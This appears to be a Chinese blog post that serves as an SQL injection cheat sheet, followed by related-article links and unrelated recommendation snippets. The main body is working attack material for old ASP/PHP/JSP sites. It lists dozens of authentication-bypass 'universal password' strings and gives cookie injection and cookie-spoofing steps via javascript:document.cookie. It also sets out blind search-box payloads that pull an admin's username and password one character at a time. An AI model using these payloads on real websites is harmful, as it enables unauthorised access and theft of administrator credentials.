数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入
另类登录注入形式:
经常有一类验证(ASP,PHP,JSP均存在),先判断user是否存在,ASP为例子:"select password from admin where user_name='"&request("user_name")&"'";然后再判断密码MD5与之对比。
猜解思路可以构造,user_name: xxx' and password>'a 如果password第一位大于a,则继续user_name: xxx' and password>'b.
seelct * from admin where username='admin' and password=''注入方法:
万能用户名: xxx' union select * from users/*
select * from admin where username=admin and password=pass注入方法:
账户:777 密码:999 union select * from admin;
万能密码:
用户名:admin'or''='
密码:'or''=' username:' or 1=1 or ''=' passwd:随便写 'or'='or'
'or''='
'or 1=1
"or"="
'or 1=1/* php
"or "a"="a
"or 1=1--
"or"="
"or"="a'='a
"or1=1--
"or=or"
''or'='or'
') or ('a'='a
'.).or.('.a.'='.a
'or 1=1
'or 1=1--
'or 1=1/*
'or"="a'='a
'or' ''=''
'or''='
'or''=''or''=' !!!!!
'or'=''
'or'='or'
'or.'a.'='a
'or1=1--
'or''='
a'or' =--
a'or'=--
or 'a'='a'
or =--
or1=--
cookie注入:
http://xxxx/view.asp?id=23
先访问http://xxxx/view.asp?id=23 接着在浏览器里输入:
javascript:alert(document.cookie="id="+escape("23 and 1=1"))
再访问http://xxxx/view.asp(未出错) 再输入:javascript:alert(document.cookie="id="+escape("23 and 1=2"))
再访问:http://xxxx/view.asp(出错) 该页面出错就表示可以用Cookie注入。
cookie欺骗
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
然后login.asp改为admin_index.asp
搜索型注入
例如:
判断注入
%' and 1=1 and '%' ='
%' and 1=2 and '%' =' 判断是否存在表
%'and(select count(*)from admin)>0 and '%'='
判断是否存在字段段
%'and(select top 1 len(username)from admin) and '%'='
%'and(select top 1 len(password)from admin) and '%'='
猜字段中的内容范围
%'and(select top 1 asc(mid(username,1,1))from admin)>102 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)>40 and '%'=' %'and(select top 1 asc(mid(username,1,1))from admin)=97 and '%'='
%'and(select top 1 asc(mid(username,2,1))from admin)=100 and '%'='
%'and(select top 1 asc(mid(username,3,1))from admin)=109 and '%'='
%'and(select top 1 asc(mid(username,4,1))from admin)=105 and '%'='
%'and(select top 1 asc(mid(username,5,1))from admin)=110 and '%'=' %'and(select top 1 asc(mid(password,1,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,2,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,3,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,4,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,5,1))from admin)=53 and '%'='
%'and(select top 1 asc(mid(password,6,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,7,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,8,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,9,1))from admin)=50 and '%'='
%'and(select top 1 asc(mid(password,10,1))from admin)=49 and '%'='
%'and(select top 1 asc(mid(password,11,1))from admin)=57 and '%'='
%'and(select top 1 asc(mid(password,12,1))from admin)=52 and '%'='
%'and(select top 1 asc(mid(password,13,1))from admin)=43 and '%'='
%'and(select top 1 asc(mid(password,14,1))from admin)=51 and '%'='
%'and(select top 1 asc(mid(password,15,1))from admin)=68 and '%'='
%'and(select top 1 asc(mid(password,16,1))from admin)=51 and '%'='
数据库其他注入思路 - 万能密码 - cookie注入 -搜索型注入的更多相关文章
- 注入语句详解(get注入,cookie注入,搜索型注入等)
注意:对于普通的get注入,如果是字符型,前加' 后加 and ''=' 拆半法 ###################################### and exists (select ...
- Sqlserver2008+搜索型注入技术
简单的判断搜索型注入漏洞存在不存在的办法是先搜索',如果出错,说明90%存在这个漏洞.然后搜索%,如果正常返回,说明95%有洞了. 然后再搜索一个关键字,比如2006吧,正常返回所有2006相关的信息 ...
- Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的. 2. 3. 00x1 SQL万能密码的构造 在登录框当中可以添加了一个单引号.报错信息如下所示: 据此报错,我们大概的可 ...
- 实验3 SQL注入原理-万能密码注入
实验目的 (1)理解[万能密码]的原理 (2)学习[万能密码]的使用 实验原理 一.访问目标网站 1.选择一个存在漏洞的论坛 http://192.168.1.3:8009 进入 2.输入用户名[ad ...
- 从c#角度看万能密码SQL注入漏洞
以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞, ...
- pikachu-搜索型注入 #手工注入
1.搜索型注入漏洞产生的原因: 在搭建网站的时候为了方便用户搜索该网站中的资源,程序员在写网站脚本的时候加入了搜索功能,但是忽略了对搜索变量的过滤,造成了搜索型注入漏洞,又称文本框注入. 2.搜索型注 ...
- 深入浅出带你玩转sqlilabs(三)--GET,POST,COOKIE,万能密码注入
常见提交方式下的注入漏洞 WEB应用在数据传递接受中,针对SQL注入安全漏洞,由于数据大小,格式等原因,脚本在接受传递时会有多种传递方式,传递方式的不同将影响到安全测试的不同 第一点:数据常见提交方式 ...
- sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码
password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码. 原因如下: 原代码中密码是123456 执行数据库查询语句 实际上执行的SQL语句是: select * from ...
- 万能密码的SQL注入漏洞其PHP环境搭建及代码详解+防御手段
目录 环境搭建 session会话 环境搭建代码 创建数据库脚本 登录界面html: 查询数据库是否为正确的账号密码php代码 连接数据库php代码: 注销登录代码(即关闭session会话) 登录成 ...
随机推荐
- IOC容器基本原理
1 IoC容器的概念 IoC容器就是具有依赖注入功能的容器,IoC容器负责实例化.定位.配置应用程序中的对象及建立这些对象间的依赖.应用程序无需直接在代码中new相关的对象,应用程序由IoC容器进行 ...
- Tweak和app交互方案【进程通信】
Core Foundation DEMO:Tweak端: CFNotificationCenterAddObserver(CFNotificationCenterGetDarwinNotifyCent ...
- 将Socket应用程序从Unix向Windows移植中应注意的几点问题
套接字(socket)当今已成为最流行的网络通信应用程序接口.套接字最初是由加利福尼亚大学Berkeley分校为Unix操作系统开发的网络通信接口,后来它又被移植到DOS与Windows系统,特别是近 ...
- 国内顶尖的sql dba 团队招人。
国内顶尖的sql dba 团队招人. 4年DBA 经验 我们希望你掌握 1.熟练关系型数据库原理.熟练一门语言(C# .Java.Python.powershell ) 2.对自动化.数据化感兴趣. ...
- 使用python读写excel
项目中要在excel要跨工作簿根据一列数据获取另一列的数据,而excel本身的函数vlookup一直不太好用,只能用程序进行处理了,最近刚接触了python,灵机一动使用Python进行处理,先将js ...
- solr特点八:Spatial(空间搜索)
前言 在美团CRM系统中,搜索商家的效率与公司的销售额息息相关,为了让BD们更便捷又直观地去搜索商家,美团CRM技术团队基于Solr提供了空间搜索功能,其中移动端周边商家搜索和PC端的地图模式搜索功能 ...
- 使用CDI+制作支持半透明的Panle
创建一个自定义控件程序集,并修改父类为Panle,添加如下代码: public partial class OpaqueLayer : Panel { private Color transparen ...
- Pi 实现VLC网络视频监控
安装摄像头 将Pi的原装摄像头安装在pi上面 ssh连接pi 通过xshell或者putty等工具连接ssh 安装VLC $ sudo apt-get update $ sudo apt-get in ...
- char、varchar、nchar、nvarchar、text的区别
char.varchar.nchar.nvarchar.text的区别 1.有var前缀的,表示是实际存储空间是变长的,varchar,nvarchar 所谓定长就是长度固定的,当输入的数据长度没有达 ...
- HBase原理–所有Region切分的细节都在这里了
本文由 网易云发布. 作者:范欣欣(本篇文章仅限内部分享,如需转载,请联系网易获取授权.) Region自动切分是HBase能够拥有良好扩张性的最重要因素之一,也必然是所有分布式系统追求无限 ...